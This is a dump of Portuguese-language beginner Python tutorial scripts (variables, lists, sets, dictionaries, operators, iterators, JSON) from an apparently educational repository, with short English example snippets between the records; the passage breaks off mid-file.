"alphanum_fraction": 0.5961262583732605,
"avg_line_length": 26.8799991607666,
"blob_id": "b598782fd519e12a7623afe3352fa64e38e074c8",
"content_id": "70f12591cbb33df36b38b94c024eb6f410646574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1418,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 50,
"path": "/semana-1/variaveis.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTipos de Variáveis em Python \n\n str (-ing) 'Texto entre aspas', 'palavra'\n bool (-lean) True ou False\n int (-eger) 1, 2, 10, 5000\n float 3.5432, 9.8, 1.61803398875\n list [ 'palavra', True, 1, 3.1415]\n dict { 'prop':'nome', 'tem':True }\n tuple ( 'palavra', True, 1, 3.1415)\n type Tipo dos tipos\n\n'''\n\n# Variáveis - Reserva um espaço na memória para armazenar um dado/valor de um determinado tipo, e o associa a um nome.\nvar_1 = 5\nvar_2 = 10\ntotal = var_1 + var_2\n\nprint(total)\n\n# tipagem dinâmica: o último valor atribuído à variável indicará o tipo dela.\nvar_1 = \"valor\" # atribuição de string\nvar_2 = 'valor' # atribuição de string\nvar_1 = 5 # atribuição de inteiro\nvar_2 = 3.1337 # atribuição de float\na, b, c = 1, 2, 'teste' # múltiplas atribuições\n\n# str - tipo composto por um conjunto 'imutável' de caracteres, texto.\nfruta = \"banana\"\nmarca = \"\"\"Tesla\"\"\"\nstr_1 = 'abc'\nstr2 = '''teste'''\nlen(fruta) # retorna o comprimento, 6.\nfruta[0] # retorna 'b'\nfruta[2:5] # retorna 'nan'\nfruta.upper() # retorna 'BANANA'\n\n# bool - verdadeiro ou falso.\nvar1 = True # verdadeiro\nvar2 = False # falso\n\n# int números inteiros - sem limites de bits.\nvar1 = 1991\nvar2 = 2020\n\n\n# float - números decimais (double).\nvar_1 = 1.2345\nvar_2 = 3.141592\n"
},
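Complementing the type overview above, a short sketch of explicit conversion (casting) between the listed types:
x = int("5")     # str -> int
y = float(3)     # int -> float
z = str(3.14)    # float -> str
print(type(x), type(y), type(z))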
{
"alpha_fraction": 0.7193695902824402,
"alphanum_fraction": 0.7208947539329529,
"avg_line_length": 22.698795318603516,
"blob_id": "d92117d9888a2369d726cb50f05632c5381c027b",
"content_id": "9e52f6deac8fdad1756043fb2bb13522a267ecce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 83,
"path": "/semana-3/arrays.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nArrays\n\nO que é um Array?\n\nUm Array é uma variável especial, que pode conter mais de um valor.\n\nUm Array pode conter muitos valores com um único nome e podemos acessar esses valores consultando um número do índice.\n\nNota: O Python não possui suporte nativo para matrizes, mas as listas do Python podem ser usadas como Arrays.\nNo entanto para trabalhar com matrizes no Python, precisamos importar uma biblioteca, como a NumPy.\n\nArrays são usados para armazenar múltiplos valores em uma variável.\n'''\n# Exemplo:\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nprint(carros)\n\n'''\nAcessando elementos de Array\n\nPodemos acessar os elementos de uma Array através de seu índice.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nelementos_carros = carros[1]\nprint(elementos_carros)\n\n# Modificando o valor de um item de Array:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros[2] = 'Nissan'\nprint(carros)\n\n'''\nComprimento de um Array\n\nUsamos o método len() para rtornar o comprimento de um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncomprimento_carros = len(carros)\nprint(comprimento_carros)\n\n'''\nLoop de elementos em um Array\n\nPodemos usar o loop FOR IN para percorrer todos os elementos de um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nfor elementos in carros:\n print(elementos)\n\n'''\nAdding Array Elements (Adicionando elementos de Array)\n\nPodemos usar o método append() para adicionar elemento em um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.append('Honda')\nprint(carros)\n\n'''\nRemoving Array Elements (Removendo Elementos de um Array)\n\nUsamos o método pop() para remover um elemento de uma Array.\n'''\n# Exemplo:\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.pop(0)\nprint(carros)\n\n# Podemos ainda usar o método remove() para remover elementos:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.remove('Ford')\nprint(carros)\n"
},
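The file above mentions NumPy for real arrays but shows no example; a minimal, illustrative sketch (requires numpy to be installed):
import numpy as np

precos = np.array([10.0, 12.5, 9.9])
print(precos.mean())  # vectorized statistics, unlike plain lists
print(precos * 2)     # element-wise arithmetic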
{
"alpha_fraction": 0.6782007217407227,
"alphanum_fraction": 0.6874279379844666,
"avg_line_length": 21.842105865478516,
"blob_id": "d815e6e547442830c8f4aafa0b0e7c1293a05f0a",
"content_id": "7bd640db4a0afa4988811641a66e29b2698a485a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 38,
"path": "/semana-1/syntax.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# A sintaxe Python para a função print():\n\nprint('Hello, World!')\n\n# Indentação Python\n\n'''\nIndentação em Python refere-se aos espaços no início de uma linha de código.\n\nOnde em outras linguagens de programação o recuo no código é apenas para legibilidade, em Python é muito importante.\n\nPython usa indentação para indicar um bloco de código.\n'''\n# Exemplo:\n\nif 5 > 2:\n print('Cinco é maior que dois!')\n\n'''\nO número de espaços depende de você como programador, mas deve ser pelo menos um.\n'''\n# Exemplo:\n\nif 5 > 2:\n print('Cinco é maior que dois!')\nif 5 > 2:\n print('Cinco é maior que dois!')\n\n'''\nVocê precisa usar o mesmo número de espaços no mesmo bloco de código, caso contrário, o Python apresentará um erro:\n'''\n# Exemplo:\n\n'''\nif 5 > 2:\n print('Cinco é maior que dois!') # Syntax Error\n print('Cinco é maior que dois!') # Syntax Error\n'''"
},
{
"alpha_fraction": 0.6833013296127319,
"alphanum_fraction": 0.6890594959259033,
"avg_line_length": 18.296297073364258,
"blob_id": "448816f61ad7fbd0736ec8f2e0049843cb3c3828",
"content_id": "3a7e345069bf5ab5cddff4f4df8eeab541560067",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 27,
"path": "/semana-4/modules.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nO que é um Módulo?\n\nConsideramos um Módulo igual a uma biblioteca de código.\nUm arquivo contendo um conjunto de funções que podemos incluir em nossos arquivos.\n'''\n# Exemplo:\n# Vamos salvar esse código com o nome do arquivo meu_modulo.py:\n\n\nimport modules as mx\n\n\ndef boas_vindas(name):\n print(\"Ola, \" + name)\n\n\n'''\nVariáveis no Módulo\n\nO módulo pode conter funções e variáveis de todos os tipos (arrays, dicionários, objetos etc.).\n'''\npessoa_1 = {\n \"nome\": \"Joao\",\n \"idade\": 32,\n \"cidade\": \"Brasilia\"\n}\n"
},
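A sketch of consuming the module defined above from another file, assuming it was saved as meu_modulo.py as its own docstring suggests:
import meu_modulo

meu_modulo.boas_vindas("Ana")
print(meu_modulo.pessoa_1["cidade"])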
{
"alpha_fraction": 0.6885474920272827,
"alphanum_fraction": 0.7178770899772644,
"avg_line_length": 26.538461685180664,
"blob_id": "d87a0acd3ad20b6712c675c7ec4bdbdbc68e1723",
"content_id": "4b554b4071c3aa7d3f7ba3baf87c2a05eaeae19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 26,
"path": "/semana-4/math.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Math\n\nPython possui um conjunto de funções matemáticas nativa, incluindo um extenso módulo matemático, \nque permite realizar tarefas matemáticas com números. \n'''\n# Funções matemáticas nativa\n# As funções min() e max() podem ser usadas para encontrar o valor mais baixo ou mais alto em um iterável:\n\nmenor_valor = min(2, 4, 6, 8, 10)\nmaior_valor = max(2, 4, 6, 8, 10)\n\nprint(menor_valor)\nprint(maior_valor)\n\n# A função abs() retorna o valor absoluto (positivo) do número especificado:\n\nnumero_aleatorio = abs(-8.25)\nprint(numero_aleatorio)\n\n# A função pow(x, y) retorna o valor de x elevado à potência de y (xy)\n# Exemplo\n# Retorna o valor de 4 à potência de 3 (igual a 5 * 5 *):\n\nx = pow(5, 3)\nprint(x)\n"
},
{
"alpha_fraction": 0.6989708542823792,
"alphanum_fraction": 0.7089765667915344,
"avg_line_length": 26.543306350708008,
"blob_id": "7042715a8ce62c6e1b092fffb9000f45c5ebde43",
"content_id": "d700c7d47ab4aba5aa4f2e5d541b5ae50a0cccfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3561,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 127,
"path": "/semana-4/iterators.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Iterators\n\nUm Iterator é um objeto que contém um número contável de valores.\nQue pode ser iterado, o que significa que podemos percorrer todos os valores.\nTecnicamente, em Python, um Iterator é um objeto que implementa o protocolo do Iterator, que consiste nos métodos __iter__() e __next__().\n\nIterator vs Iterable\n\nLists, tuples, dictionaries e sets são todos objetos iteráveis. Eles são contêineres iteraveis dos quais podemos obter um Iterator.\nTodos esses objetos possuem um método iter() que é usado para obter um Iterator.\n'''\n# Exemplo:\n# Retorna um Iterator de uma tupla e, imprime cada um de seu valor:\nminha_tuple_frutas = ('apple', 'banana', 'cherry', 'orange', 'melon')\nmeu_iterator = iter(minha_tuple_frutas)\n\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\n\n# Até mesmo Strings são objetos iráveis e podem retornar um Iterator.\n# Exemplo:\n\nminha_string = 'banana'\nmeu_iterator_2 = iter(minha_string)\n\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\n\n'''\nLooping Through an Iterator\n\nPodemos ainda, usar um loop FOR para iterar através de um objeto iterável.\n'''\n# Exemplo:\n# Iterar os valores de uma Tuple:\n\nminha_tuple_frutas_2 = ('maca', 'banana', 'cereja')\n\nfor frutas in minha_tuple_frutas_2:\n print(frutas)\n\n# Iterar os caracteres de uma String:\n\nminha_string_fruta = 'cereja'\n\nfor fruta in minha_string_fruta:\n print(fruta)\n\n# O laço For cria um objeto Iterador e executa o método next() para cada laço.\n\n'''\nCreate an Iterator\n\nPara criar um objeto/classe como um Iterator, implementamos os métodos __iter__() e __next__() em seu objeto.\n\nComo vimos em Classes/Objetos do Python, todas as classes têm uma função chamada __init__(), que permite que façamos algumas inicializações quando\no objeto está sendo criado.\n\nO método __iter__() atua de forma semelhante, podemos fazer operações (inicializaçõe, etc.), mas devemos sempre retornar o próprio objeto Iterador.\n\nO método __next__() também permite que façamos operações que deve retornar o próximo item na sequência.\n'''\n# Exemplo:\n# Cria um Iterador que retorne números, começando com 1, e cada sequência aumentará em um (retornando 1,2,3,4,5 e etc.):\n\n\nclass meus_numeros:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n x = self.a\n self.a += 1\n return x\n\n\nminha_classe = meus_numeros()\nmeu_iterator_3 = iter(minha_classe)\n\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\n\n\n'''\nStopIteration\n\nO exemple acima continuaria para sempre se tivéssemos instruções next() suficientes ou se fosse usado em um loop For.\n\nPara evitar que a iteração continue indefinidamente, podemos usar a instrução StopIteration.\n\nNo método __next__(), podemos adicionar uma condição de término para gerar um erro se a iteração for feita um número específico de vezes.\n'''\n# Exemplo:\n# Pare após 20 iterações:\n\n\nclass meus_numeros_2:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n if self.a <= 20:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\n\nminha_classe_2 = meus_numeros_2()\nmeu_iterator_4 = iter(minha_classe_2)\n\nfor x in meu_iterator_4:\n print(x)\n"
},
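The same counting iterator can be written as a generator function, an alternative the file above does not cover; yield handles __iter__/__next__ and StopIteration automatically:
def meus_numeros_gen(limite=20):
    a = 1
    while a <= limite:
        yield a  # suspends here and resumes on the next iteration
        a += 1

for x in meus_numeros_gen():
    print(x)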
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.6994949579238892,
"avg_line_length": 19.789474487304688,
"blob_id": "cdd6c7ae7d2666ba9c3a14d383060dc8e616b624",
"content_id": "19fba002fd772fba188c370eedc07911d421c9f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 19,
"path": "/semana-4/convert_python_to_json.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "\nimport json\n'''\nConverter de Python para JSON\n\nSe tivermos um objeto Python, poderemos convertê-lo em uma string JSON usando o método json.dumps().\n'''\n# um objeto Python (dict):\n\ndados_pessoais = {\n \"nome\": \"Rogerio\",\n \"idade\": 30,\n \"cidade\": \"Brasili-DF\"\n}\n\n# converte para JSON:\ndados_convertidos = json.dumps(dados_pessoais)\n\n# o resultado será uma string:\nprint(dados_convertidos)\n"
},
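The reverse direction, for completeness: json.loads() parses a JSON string back into a Python dict:
import json

dados_json = '{"nome": "Rogerio", "idade": 30}'
dados = json.loads(dados_json)
print(dados["idade"])  # 30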
{
"alpha_fraction": 0.5562784671783447,
"alphanum_fraction": 0.5797007083892822,
"avg_line_length": 20.64788818359375,
"blob_id": "a7ec9530bb93f29211162ebb3f1414bc34bffcc9",
"content_id": "4fcc3978b2c03b1f60247d58f43f64b8dc4db411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1550,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 71,
"path": "/semana-4/format_the_result.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFormart the Result\n\nO método json.dumps() possui parâmetros para facilitar a leitura do resultado.\n\"\"\"\n\nimport json\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\n# Usamos quatro recuos para facilitar a leitura do resultado:\n\nprint(json.dumps(x, indent=4))\n\n\n\"\"\"\nPodemos também definirmos os separadores, o valor padrão é (\", \", \": \"), que significa usar uma vírgula e um espaço para\nsepararmos cada objeto, e dois pontos e um espaço para separar as chaves dos valores:\n\"\"\"\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\nprint(json.dumps(x, indent=4, separators=(\". \", \" = \")))\n\n\n\"\"\"\nOrder the Result\n\nO método json.dumps() possui parâmetros para ordenar as chaves no resultado.\n\nUsamos o parâmetro sort_keys para especificar se o resultado deve ser classificado ou não:\n\"\"\"\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\n# classificamos o resultado em ordem alfabética por chaves:\n\nprint(json.dumps(x, indent=4, sort_keys=True))\n"
},
{
"alpha_fraction": 0.6824703812599182,
"alphanum_fraction": 0.6843418478965759,
"avg_line_length": 21.11034393310547,
"blob_id": "9c7a748445b30c19ec58f5c3431f7e10281007e4",
"content_id": "2b5348efe9c8ea968f50c58e37e95520f3b5c884",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3235,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 145,
"path": "/semana-2/sets.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nSET (Conjunto)\n\nUm Set é uma coleção de itens não ordenada e nem indexada. Em Python Sets são escritos entre colchetes {}.\n'''\n# Exemplo:\n\nset_de_animais_felinos = {\n 'Tigre', 'Leao', 'Lince', 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'\n}\n\nprint(set_de_animais_felinos)\n\nprint(type(set_de_animais_felinos))\n\n'''\n Acesso de itens (Access Items)\n\n Não podemos acessar itens de um conjunto consultando seu índice, pois os conjuntos são desordenados e seus itens não possuem índice.\n Mas podemos percorrer os itens do conjunto usando um loop for ou perguntar se um valor específico está presente em um conjunto, usando a in keyword.\n'''\n# Exemplo:\n\nset_de_animais_felinos = {\n 'Tigre', 'Leao', 'Lince', 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'\n}\n\nfor x in set_de_animais_felinos:\n print(x)\n\n# Verifica se 'Guepardo' está presente no conjunto:\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince',\n 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'}\n\nprint('Guepardo' in set_de_animais_felinos)\n\n'''\nAdição de Itens (Add Items)\n\nPara adicionar um item em um conjunto, usamos o método add().\nPara adicionar mais de um item, usamos o método update().\n'''\n# Exemplo de add():\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince'}\n\nset_de_animais_felinos.add('Guepardo')\n\nprint(set_de_animais_felinos)\n\n# Exemplo de update():\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince'}\n\nset_de_animais_felinos.update(['Guepardo', 'Gato', 'Jaguar'])\n\nprint(set_de_animais_felinos)\n\n'''\nPara sabermos quantos itens um conjunto(Set) possui, \nusamos o método len().\n'''\n\n# Exemplo:\n\nset_animais = {'gato', 'cachorro', 'elefante'}\n\nprint(len(set_animais))\n\n'''\nPara removermos itens de um conjunto, \nusamos o método remove() ou o método discard().\n'''\n\n# Uso do remove():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.remove('abacate')\n\nprint(set_frutas)\n\n# Uso do discard():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.discard('abacate')\n\nprint(set_frutas)\n\n'''\nPara removermos o últmo item de um conjunto, \nusamos o método pop() e para limparmos um conjunto o método clear().\n'''\n\n# Uso do pop():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nfrutas_restante = set_frutas.pop()\n\nprint(frutas_restante) # Retorna o item removido\nprint(set_frutas) # Conjunto de frutas restantes\n\n# Uso do clear():\n\nset_frutas = {'abacate', 'banana', 'cereja'}\n\nset_frutas.clear()\n\nprint(set_frutas) # Retorna conjunto vazio 'set()'\n\n'''\nUnião de Conjuntos (Union of Sets)\nPodemos usar o método union(), que retorna um novo conjunto contendo todos os itens dos dois conjuntos, \nou o método update() que insere todos os itens de um conjunto em outro.\n'''\n\n# Uso do union():\n\nset_letras = {'a', 'b', 'c'}\nset_numeros = {1, 2, 3}\n\nset_uniao = set_letras.union(set_numeros)\nprint(set_uniao)\n\n# Uso do update()\n\nset_letras = {'a', 'b', 'c'}\nset_numeros = {1, 2, 3}\n\nset_letras.update(set_numeros)\nprint(set_letras)\n\n'''\nConstrutor set() (The set() Constructor)\n\nÉ possível usar o construtor set() para gerar um conjunto.\n'''\n# Exemplo:\n\nset_frutas_with_constructor = set(\n ('maca', 'banana', 'cereja')) # uso de duplo parênteses\nprint(set_frutas_with_constructor)\n"
},
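Beyond union()/update() shown above, sets also support intersection and difference; a short sketch:
a = {"maca", "banana", "cereja"}
b = {"banana", "cereja", "uva"}
print(a.intersection(b))  # items in both -> {'banana', 'cereja'}
print(a.difference(b))    # items only in a -> {'maca'}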
{
"alpha_fraction": 0.6393969655036926,
"alphanum_fraction": 0.6572864055633545,
"avg_line_length": 16.456140518188477,
"blob_id": "583f4e77fd6cbef03239c6b1cd269199ffa19af0",
"content_id": "059c7633898da94bb66dbc2f04a78c566d5e5077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5054,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 285,
"path": "/semana-2/operators.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nOperators (Operadores)\n\nOperadores em Python são usados para executar operações em variáveis e valores.\nPython divide os Operadores nos seguintes grupos:\n'''\n\n# Arithmetic operators (Operadores aritméticos)\n# Assignment operators (Operadores de atribuição)\n# Comparison operators (Operadores de comparação)\n# Logical operators (Operadores lógicos)\n# Identity operators (Operadores de identidade)\n# Membership operators (Operadores de associação)\n# Bitwise operators (Operadores bit a bit)\n\n'''\nArithmetic operators (Operadores aritméticos)\n\nSão usados com valores numéricos para executar operações matemáticas comuns.\n'''\n# Operador Addition (+)\nx = 5\ny = 3\nprint(x + y)\n\n# Operador Subtraction (-)\nx = 5\ny = 3\nprint(x - y)\n\n# Operador Multiplication (*)\nx = 5\ny = 3\nprint(x * y)\n\n# Operador Division (/)\nx = 12\ny = 3\nprint(x / y)\n\n# Operador Modulus (%)\nx = 5\ny = 2\nprint(x % y)\n\n# Operador Exponentiation (**)\nx = 2\ny = 5\nprint(x ** y) # igual a 2*2*2*2*2\n\n# Operador Floor Division (//)\nx = 15\ny = 2\nprint(x // y) # a divisão // arredonda o resultado para o número inteiro mais próximo\n\n'''\nAssignment operators (Operadores de atribuição)\n\nSão usados para atribuir valores a variáveis.\n'''\n\n# Operador (=) igual a (x = 5)\n\nx = 5\nprint(x)\n\n# Operador (+=) igual a (x = x + 3)\n\nx = 5\nx += 3\n\nprint(x)\n\n# Operador (-=) igual a (x = x - 3)\n\nx = 5\nx -= 3\n\nprint(x)\n\n# Operador (*=) igual a (x = x * 3)\n\nx = 5\nx *= 3\n\nprint(x)\n\n# Operador (/=) igual a (x = x / 3)\n\nx = 5\nx /= 3\n\nprint(x)\n\n# Operador (%=) igual a (x = x % 3)\n\nx = 5\nx %= 3\n\nprint(x)\n\n# Operador (//=) igual a (x = x // 3)\n\nx = 5\nx //= 3\n\nprint(x)\n\n# Operador (**=) igual a (x = x ** 3)\n\nx = 5\nx **= 3\n\nprint(x)\n\n# Operador (&=) igual a (x = x & 3)\n\nx = 5\nx &= 3\n\nprint(x)\n\n# Operador (|=) igual a (x = x | 3)\n\nx = 5\nx |= 3\n\nprint(x)\n\n# Operador (^=) igual a (x = x ^ 3)\n\nx = 5\nx ^= 3\n\nprint(x)\n\n# Operador (>>=) igual a (x = x >> 3)\n\nx = 5\nx >>= 3\n\nprint(x)\n\n# Operador (<<=) igual a (x = x << 3)\n\nx = 5\nx <<= 3\n\nprint(x)\n\n'''\nOperadores de comparação\nSão usados para comparar dois valores.\n'''\n\n# Exemplo:\n# Operador Igual (==)\nx = 5\ny = 3\n\nprint(x == y)\n\n# Operador Não igual (!=)\nx = 5\ny = 3\n\nprint(x != y)\n\n# Operador Maior que (>)\nx = 5\ny = 3\n\nprint(x > y)\n\n# Operador Menor que (<)\nx = 5\ny = 3\n\nprint(x < y)\n\n# Operador Maior do que ou Igual a (>=)\nx = 5\ny = 3\n\nprint(x >= y)\n\n# Operador Menor do que ou Igual a (<=)\nx = 2\ny = 3\n\nprint(x <= y)\n\n'''\nOperadores Lógicos\n\nSão usados para combinar declarações condicionais.\n'''\n\n# Operador AND (retorna True se ambas declarações forem verdadeiras).\nx = 5\n\nprint(x > 3 and x < 10)\n\n# Operador OR (retorna True se uma das declarações for verdadeira).\nx = 5\n\nprint(x > 3 or x < 4)\n\n# Operador NOT (reverte o resultado, retorna False se o resultado for verdadeiro).\nx = 5\n\nprint(not(x > 3 and 5 < 10))\n\n'''\nOPERADORES DE IDENTIDADE\n\nOs operadores de Identidade são usados para comparar os objetos, não se forem iguais,\nmas se forem realmente o mesmo objeto, com o mesmo local na memória.\n'''\n# Operador IS (retorna True se ambas variáveis forem um objeto):\n\nx = ['apple', 'banana']\ny = ['apple', 'banana']\nz = x\n\nprint(x is z)\n\n# retorna True porque Z é o mesmo objeto que X\n\nprint(x is y)\n\n# retorna False poque X não é o mesmo objeto que Y, mesmo se eles tiverem o mesmo conteúdo.\n\nprint(x == 
y)\n\n# para demonstrar a diferença entre \"is\" e \"==\": essa comparação retorna True porque x é igual a y.\n\n# Operador IS NOT (retorna True se ambas variáveis não forem o mesmo objeto).\n\nx = ['apple', 'banana']\ny = ['apple', 'banana']\nz = x\n\nprint(x is not z)\n\n# retorna False porque Z é o mesmo objeto x\n\nprint(x is not y)\n\n# retorna True porque X não é o mesmo objeto que Y, mesmo se eles tiverem o mesmoconteúdo.\n\nprint(x != y)\n\n# para demonstrar a difernça entre \"NOT IS\" e \"!=\"...essa comparação retorna False porque X é igual a Y.\n\n'''\nOPERADORES DE ASSOCIAÇÃO (Membership Operators)\n\nOs Operadores de Associação são usados se uma sequência é apresentada em um objeto.\n'''\n# Operador IN (retorna True se a sequência com o valor especificado estiver presente no objeto)\n\nx = ['apple', 'banana']\n\nprint('banana' in x)\n\n# Operador NOT IN (retorna True se uma sequência com o valor especificado não estiver presente no objeto)\n\nx = ['apple', 'banana']\n\nprint('pineapple' not in x)\n\n'''\nOPERADORES BITWISE (Bitwise Operators)\n\nOperadores Bitwise (bit a bit) são usados para comparar números (binários):\n\n- Operador & = AND (define cada bit como 1 se ambos bits forem 1)\n- Operador | = OR (define cada bit como 1 se um dos dois bits for 1)\n- Operador ^ = XOR (define cada bit como 1 se somente um dos dois bits for 1)\n- Operador ~ = NOT (invert todos os bits)\n- Operador << = Zero desvio à esquerda (desloca-se para a esquerda pressionando os zeros da direita e deixando os bits à esquerda de fora)\n- Operador >> = Mudança à direita (desloca-se para a direita empurrando cópias do bit mais à esquerda da esquerda e deixa os bits mais à direita de fora)\n\n'''\n"
},
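The bitwise table above lists no code; a quick demonstration of the operators on small binary literals:
x, y = 0b0101, 0b0011  # 5 and 3
print(bin(x & y))  # 0b1   (AND)
print(bin(x | y))  # 0b111 (OR)
print(bin(x ^ y))  # 0b110 (XOR)
print(x << 1)      # 10    (left shift doubles the value)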
{
"alpha_fraction": 0.628146231174469,
"alphanum_fraction": 0.6472533345222473,
"avg_line_length": 17.640411376953125,
"blob_id": "12abe229071d0b32ed78a46c2f2345adf570d85e",
"content_id": "2d6590fd6bf74f8fb9556a7ebf413ba7e2c83924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5512,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 292,
"path": "/semana-2/dictionaries.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nDicionários (Dictionaries)\n\nUm dicionário é uma coleção não ordenada de itens, mutáveis e classificaveis. Em Python dicionários são escritos entre colchetes,\ne possuem vlaores e chaves.\n'''\n# Exemplo:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nprint(dicionario_carros)\n\n# Acessando itens - Podemos acessar itens através do nome da chave:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nmodelo_carro = dicionario_carros['modelo']\n\nprint(modelo_carro)\n\n# Há também o método get() que podemos utilizar para acessar os itens de uma chave:\n\ndicionario_carros = {\n 'marca': 'fiat',\n 'modelo': 'argo',\n 'year': '2020'\n}\n\nmodelo_carro = dicionario_carros.get('marca')\n\nprint(modelo_carro)\n\n'''\nAlterar Valores (Change Values)\n\nPodemos alterar um valor de um item específico, referindo-se ao seu nome de chave.\n'''\n# Exemplo:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\ndicio_carros['modelo'] = 'Corsa'\nprint(dicio_carros)\n\n\n'''\nLoop em um dicionário (Loop Through a Dictionary)\n\nUsamos o loop for para percorrer um dicionário.\nAo percorrer um dicionário, o valor retornado é a chave do dicionário, mas existem métodos para retornar os valores também.\n'''\n\n# Retornando chaves de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros:\n print(x)\n\n# Retornando valores de chave de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros:\n print(dicio_carros[x])\n\n# Uso do método values(), para retornar os valores de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x in dicio_carros.values():\n print(x)\n\n# Uso do método items(), para retornar as chaves e os valores de um dicionário:\n\ndicio_carros = {\n 'marca': 'Ford',\n 'modelo': 'Fiesta',\n 'ano': '2020'\n}\n\nfor x, y in dicio_carros.items():\n print(x, 